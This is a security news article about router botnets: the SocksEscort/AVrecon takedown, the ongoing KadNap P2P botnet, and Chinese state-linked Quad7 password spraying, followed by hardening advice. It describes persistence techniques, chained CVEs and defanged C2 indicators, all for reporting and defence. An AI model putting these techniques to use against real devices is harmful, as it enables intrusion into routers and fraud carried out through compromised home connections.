Three separate router botnet campaigns hit the news within days of each other this month. One was dismantled by a nine-country law enforcement coalition after six years of operation. Another is still running right now with 14,000 infected devices. A third has been quietly targeting Microsoft 365 accounts for years on behalf of a Chinese state-linked threat actor. None of the device owners knew a thing.
The router sitting between you and the internet is, for a criminal botnet operator, close to an ideal piece of infrastructure. It runs continuously. It has a residential IP address that bypasses most blocklists. It has no antivirus software, no endpoint detection, and no user paying attention to it. In many cases it runs firmware that was never updated after the day it was unboxed. And because routers exist at the edge of the network rather than inside it, they are largely invisible to the security tools organizations use to monitor their own environments.
This combination of factors has produced an economy. Criminal proxy services buy access to infected routers in bulk, then sell that access to other criminals who use it to commit fraud, launch credential-stuffing attacks, distribute ransomware, and run DDoS campaigns. The device owner pays the electricity bill. The criminal pays the proxy subscription. Everyone else absorbs the cost of the crimes being committed through that connection.
Why Routers Are the Preferred Target
Routers and edge networking devices share a set of characteristics that make them structurally attractive for botnet operators, and those characteristics have not changed much over the years. The core problem is that consumer and small-office routers were built to be deployed once and forgotten. There is no automatic update mechanism in most models. Vendors support hardware until it reaches end-of-life, and then it stops receiving patches entirely. The device keeps working as a router, so the owner has no reason to replace it, but its firmware accumulates unpatched vulnerabilities over time.
Research from Forescout Vedere Labs, which analyzed ninety days of honeypot data, found that OT perimeter devices like routers accounted for 67 percent of all recorded attacks on connected devices. That figure reflects something real: these devices are not just targeted because they are vulnerable. They are targeted because compromising one gives an attacker a persistent, trusted vantage point inside a network that is difficult to detect and difficult to evict from.
The FBI described the structural problem plainly in a flash alert published this month alongside the SocksEscort takedown: routers and IoT devices "often lack Anti-Virus, Endpoint Detection and Response, or other software which might allow a network owner to detect the malware." That absence of detection capability is not a bug in the attacker's plan. It is the plan.
"Threat actors are aware of these vulnerabilities and exploit them to install malware, gain control of the device, and sell access to them as residential proxies." — FBI Flash Alert, March 2026
SocksEscort: A Sixteen-Year Operation Dismantled
On March 11, 2026, Europol and the U.S. Department of Justice announced the takedown of SocksEscort, a criminal residential proxy service that had been operating since approximately 2009 and had been selling access to compromised routers since at least the summer of 2020. The operation, codenamed Operation Lightning, involved law enforcement agencies from Austria, Bulgaria, France, Germany, Hungary, the Netherlands, Romania, and the United States. Authorities seized 34 domains and 23 servers across seven countries and froze $3.5 million in cryptocurrency.
The scale of what was dismantled is worth pausing on. Since 2020, SocksEscort had offered access to approximately 369,000 different IP addresses across 163 countries. As of February 2026, just before the takedown, the service listed around 8,000 active infected routers for sale, with 2,500 of those located in the United States. The service's payment platform had received more than $5.7 million from its customers over its operational life.
The malware behind SocksEscort was called AVrecon. It is written in C and primarily targets devices running MIPS and ARM architectures, which covers the vast majority of consumer and small-office routers. AVrecon spread by scanning for internet-connected devices with exposed vulnerable services and then exploiting remote code execution flaws, command injection vulnerabilities, and weaknesses in exposed SOAP interfaces. Once inside a device, it established a remote shell to an attacker-controlled server and set up a modular command-and-control framework that could be extended with new exploit modules as needed.
What made SocksEscort particularly difficult to displace was its persistence mechanism. Rather than simply dropping a file on the device's filesystem, the operators used the router's own built-in update mechanism to flash a custom firmware image containing a copy of AVrecon, hard-coded to execute on device startup. The modified firmware also disabled the device's update and flashing features entirely, meaning the router could not be patched or reflashed without physical access. Firmware updates would not remove the infection. The device was, for practical purposes, permanently compromised.
The FBI noted that AVrecon targeted approximately 1,200 device models manufactured by Cisco, D-Link, Hikvision, MikroTik, NETGEAR, TP-Link, and Zyxel. The most commonly abused models included D-Link DIR-818LW, DIR-850L, and DIR-860L routers, Netgear DGN2200v4 and R7000 units, TP-Link Archer C20, TL-WR840N, TL-WR849N, and WR841N models, and nine Zyxel models including the VMG3925-B10A and VMG3925-B10C. Many of these devices were deployed by ISPs and supplied directly to customers, sometimes under rebranded names.
The crimes facilitated through the SocksEscort network were not abstract. The DOJ cited specific documented cases: a cryptocurrency investor in New York who lost $1 million, a manufacturing company in Pennsylvania that lost $700,000, and U.S. service members whose MILITARY STAR card accounts were defrauded of $100,000. The service was also used to facilitate ransomware distribution, DDoS attacks, and the distribution of child sexual abuse material. Europol's executive director, Catherine De Bolle, described the underlying dynamic in a statement accompanying the announcement.
"Cybercrime thrives on anonymity. Proxy services like SocksEscort provide criminals with the digital cover they need to launch attacks, distribute illegal content and evade detection. By dismantling this infrastructure, law enforcement has disrupted a service that enabled cybercrime on a global scale." — Catherine De Bolle, Executive Director, Europol
Lumen's Black Lotus Labs, which assisted in the investigation, noted that over the past several years SocksEscort maintained an average of approximately 20,000 distinct victims weekly, with communications routed through an average of 15 command-and-control nodes. The investigation began in June 2025 and the Shadowserver Foundation also assisted alongside Black Lotus Labs. An FBI official told The Record that SocksEscort had 124,000 users, and that seized servers would be used to target other cybercriminal activity.
KadNap: The Botnet Still Running Today
While SocksEscort is gone, it has not taken the market for criminal proxy services with it. A newer botnet called KadNap, first detected in August 2025, was publicly disclosed by Black Lotus Labs in March 2026 with more than 14,000 infected devices already compromised, over 60 percent of them in the United States. KadNap primarily targets ASUS routers, though its operators have deployed it against a broader range of edge networking devices.
KadNap operates differently from SocksEscort in one technically significant way. Rather than using a traditional command-and-control infrastructure with centralized servers, KadNap uses a customized version of the Kademlia Distributed Hash Table protocol — the same decentralized peer-to-peer architecture used by some file-sharing networks. This makes the botnet substantially more resilient than one relying on fixed C2 servers, because there is no single infrastructure point that can be seized to disrupt communications.
The attack chain begins with a shell script called aic.sh, downloaded from a C2 server at IP address 212.104.141[.]140. This script creates a cron job that retrieves the shell script at the 55-minute mark of every hour, renames it to .asusrouter, and runs it. The naming convention is deliberate camouflage — a file called .asusrouter on an ASUS router is designed to look like a legitimate system process.
Black Lotus Labs has published indicators of compromise for KadNap. If you operate your own firewall or IDS infrastructure, adding these IoCs to your block lists is a direct countermeasure. Lumen has also taken steps to block traffic to KadNap's known control infrastructure on its own network backbone.
Once infected, the device is enrolled in the peer-to-peer network and marketed through a proxy service called Doppelgänger, operating at doppelganger[.]shop. The service advertises residential proxies across more than 50 countries, claiming complete anonymity for customers. Researchers assess Doppelgänger to be a rebrand of Faceless, an older proxy service previously associated with the TheMoon malware — which also targeted ASUS routers. The service appears to have launched in May or June 2025, just months before KadNap was first detected.
Black Lotus Labs described what sets KadNap apart from similar botnets in a statement accompanying their disclosure: "The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control. Their intention is clear — avoid detection and make it difficult for defenders to protect against."
The customer base for a service like Doppelgänger uses the access for credential stuffing, DDoS attacks, brute-force campaigns, and ad fraud. The device owners hosting this traffic have no awareness it is occurring. KadNap's current scale is smaller than SocksEscort's peak, but its decentralized architecture makes it more resistant to the kind of coordinated infrastructure seizure that ended SocksEscort's run.
Quad7: State-Sponsored Password Spraying
Not every router botnet is criminal-for-hire. The Quad7 botnet — also tracked as CovertNetwork-1658, Xlogin, and 7777 — represents a different category entirely. Quad7 is assessed by Microsoft and multiple security firms to be operated by, or on behalf of, Storm-0940, a Chinese state-sponsored threat actor. Where SocksEscort and KadNap are financial crime infrastructure, Quad7 is espionage infrastructure.
The botnet gets its name from the TCP port 7777 that infected routers expose as a backdoor shell. Devices compromised by Quad7 also run a SOCKS5 proxy on port 11288, which is used to relay authentication attempts against external services. The primary use observed by researchers has been systematic, low-rate password spraying against Microsoft 365 accounts — submitting roughly one authentication attempt per account per day to stay below detection thresholds while working through large volumes of targets.
In September 2025, TP-Link disclosed that two vulnerabilities in its Archer C7 and TL-WR841N/ND routers were being actively chained by Quad7 operators. CVE-2025-50224 is an authentication bypass flaw that allows an attacker to steal credentials stored on the router. CVE-2025-9377 is a command injection remote code execution vulnerability in the router's Parental Control feature. Chained together, they give an attacker full device compromise from an unauthenticated position over the network. CISA added CVE-2025-9377 to its Known Exploited Vulnerabilities catalog in August 2025. TP-Link issued firmware updates for both affected models despite their end-of-life status, given the severity of the active exploitation.
At its peak, Quad7 had compromised over 16,000 devices worldwide, with a concentration in Bulgaria, Russia, the United States, and Ukraine. Sekoia.io researchers, who conducted a detailed analysis of the botnet, noted that authentication attempts relayed through Quad7 have a distinctive fingerprint visible in Microsoft Entra ID sign-in logs: they use an outdated Chrome user-agent string and authenticate via an application ID corresponding to Microsoft Azure PowerShell, which does not support modern authentication flows. Organizations monitoring interactive sign-in events would miss these attempts entirely because they occur through a different authentication path.
"Organizations relying solely on interactive sign-in monitoring are blind to these attacks." — SecurityScorecard warning on router-based password spraying
In February 2025, SecurityScorecard disclosed a related campaign involving a botnet of approximately 130,000 devices targeting Microsoft 365 service accounts globally. That campaign exploited Basic Authentication — an older method that transmits credentials without supporting multi-factor authentication — allowing attackers to bypass MFA entirely. Microsoft had been working toward deprecating Basic Auth since 2023. The campaigns targeting it are a direct response to the window of opportunity that deprecation timeline created.
A separate ASUS router campaign disclosed in May 2025 by GreyNoise added another layer to the picture. Researchers observed a stealth operation using CVE-2023-39780 and two authentication bypass techniques without assigned CVEs to compromise nearly 9,000 ASUS routers. The attacker's method was notable for what it left behind: no malware files on disk. Instead, SSH access was enabled via official ASUS router settings, and a custom public SSH key was inserted into the device's authorized keys file. The configuration was stored in NVRAM, not on disk, meaning firmware updates would not remove the backdoor.
The Bigger Pattern
Viewed together, these campaigns reveal something about how attackers have come to think about routers. They are not just vulnerable devices. They are a commodity resource — a type of infrastructure that can be mined, monetized, and maintained at scale with relatively low effort once an exploit is available.
The RondoDox botnet, active throughout 2025, demonstrates what scaled exploitation looks like in practice. Researchers at CloudSEK documented RondoDox operating across three phases: initial reconnaissance from March through April 2025, daily mass exploitation of IoT devices and web applications from April through June, and then hourly automated deployment at large scale from July onward. By December 2025, the campaign had incorporated CVE-2025-55182, a critical remote code execution flaw in React Server Components and Next.js frameworks with a CVSS score of 10.0, affecting an estimated 90,300 exposed instances at year's end. RondoDox also deployed a variant of Mirai on compromised devices — the same Mirai lineage that has been circulating through router ecosystems since 2016.
Mirai's persistence as a threat is itself instructive. It first appeared in 2016, its source code was published that same year, and variants of it continue to appear in new campaigns nearly a decade later. Routers running the same firmware vulnerabilities Mirai originally exploited are still online today because their owners have never applied a patch, or because no patch was ever issued for their model, or because patching a router is not something a typical home or small-business user thinks to do.
Operation WrtHug, disclosed by SecurityScorecard's STRIKE team in November 2025, targeted specific end-of-life ASUS router models using CVE-2025-2492, an improper authentication control flaw rated 9.2 on the CVSS scale. Researchers identified over 50,000 unique IP addresses associated with compromised devices globally. The campaign's operators left a distinctive marker: infected routers shared a unique TLS certificate valid for 100 years, an indicator of an operator planning for very long-term persistence.
The Quad7 botnet, meanwhile, illustrates that this is not exclusively a criminal enterprise problem. State actors have reached the same conclusion about routers that criminal proxy services did: they are reliable, persistent, and essentially invisible to most defenders. When a nation-state threat actor wants to conduct espionage or credential theft at scale while obscuring their origin, routing traffic through tens of thousands of compromised home routers is a solved problem.
The FBI's flash alert on AVrecon specifically named the following commonly abused models: D-Link DIR-818LW, DIR-850L, DIR-860L; Hikvision IP cameras; Netgear DGN2200v4, R7000; TP-Link Archer C20, TL-WR840N, TL-WR849N, WR841N; and Zyxel VMG3925-B10A, VMG3925-B10C among others. If you operate any of these models, treat them as compromised until verified clean. Many were distributed by ISPs under rebranded names.
Key Takeaways
- Update firmware now, not eventually. The vulnerabilities being exploited across KadNap, SocksEscort, Quad7, and Operation WrtHug are known and documented. Many are patched in current firmware releases. Running outdated firmware on any internet-connected router is an open invitation. Schedule quarterly firmware checks as a minimum cadence.
- Replace end-of-life hardware. Patches cannot fix a device that is no longer supported. TP-Link issued emergency firmware for end-of-life models specifically because active exploitation was documented. That is not a sustainable posture. If your router model is end-of-life, the vendor cannot protect it and you cannot protect it. Replace it.
- Disable remote management unless you have a specific operational need. The Quad7 botnet's exploitation of TP-Link routers requires that the remote administration interface be exposed to the internet. It is disabled by default. Leaving it enabled without a documented operational reason is unnecessary attack surface.
- Change default credentials immediately. A significant portion of router compromises — across every campaign described here — begin with weak or default credentials. Default username and password combinations are publicly documented for every consumer router model. There is no environment in which the factory default is an acceptable credential.
- Monitor for SocksEscort's persistence technique specifically. If you manage routers that may have been exposed to AVrecon, a factory reset followed by manual reconfiguration is necessary. Firmware updates alone will not remove the infection because the malware flashed custom firmware that disabled future update capability. The FBI's flash alert contains the full list of IoCs.
The SocksEscort takedown is a genuine law enforcement success, and it is worth acknowledging as one. A nine-country coalition dismantled infrastructure that had been operational for sixteen years and had facilitated millions of dollars in documented consumer fraud. At the same time, KadNap is still running. Quad7 is still running. New campaigns will emerge to fill the gap SocksEscort left behind, because the underlying conditions that made all of these operations possible — unpatched firmware, default credentials, no monitoring, no detection capability — have not changed. The router botnet economy exists because the supply of vulnerable devices is essentially unlimited and the cost of exploitation is very low. That equation does not resolve itself.